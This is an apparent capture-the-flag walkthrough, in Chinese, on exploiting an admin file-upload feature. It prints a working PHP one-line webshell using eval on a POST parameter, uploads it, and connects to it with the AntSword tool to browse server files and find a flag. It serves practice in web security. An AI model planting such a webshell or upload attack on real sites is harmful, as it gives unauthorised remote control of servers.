1.登录网站后台,寻找文件上传地方
进入网站管理后台并登录管理员帐户和密码,寻找文件上传点。此网站有多个可上传文件的地方,在这我们选择附件管理页面中的上传附件。
2.写入一句话木马文件,并上传到网站上
为方便寻找可直接在桌面上新建一个webshell.php文件,以记事本形式打开,在里面写入如下代码并保存。<?php @eval($_POST['shell']);?>
回到网站后台附件管理处,将所写的webshell.php文件上传,附件标题可随意命名。
文件上传成功
3.寻找文件上传后的地址,找到文件的地址
在后台寻找无果,回到网站前端主页面,寻找上面上传的文件所在地。将页面向下拉,找到“常用文件”,点击左侧的党政文件,找到上传的文件。在文件标题的右侧有一个下载,右击选择在新标签页中打开链接。
此时在新页面url栏中的就是所上传的文件的地址。
4.打开蚁剑连接网站上传的文件
打开蚁剑,在空白区右键选择添加数据,在url地址框中输入所上传的文件的地址,在连接密码框中输入shell,然后选择左上角的添加,会显示成功。
5.在蚁剑点击新添加的数据,找到flag文件
点开
点开新添加的数据后,点击第一行的文件夹,在右侧文件中下拉到最下方,看到显眼的flag.sh文件
打开文件,查阅文件内容,发现flag的文件路径。回到原来的文件,在相应的路径中找到并打开文件,发现了flag。回到答题页面将flag提交。
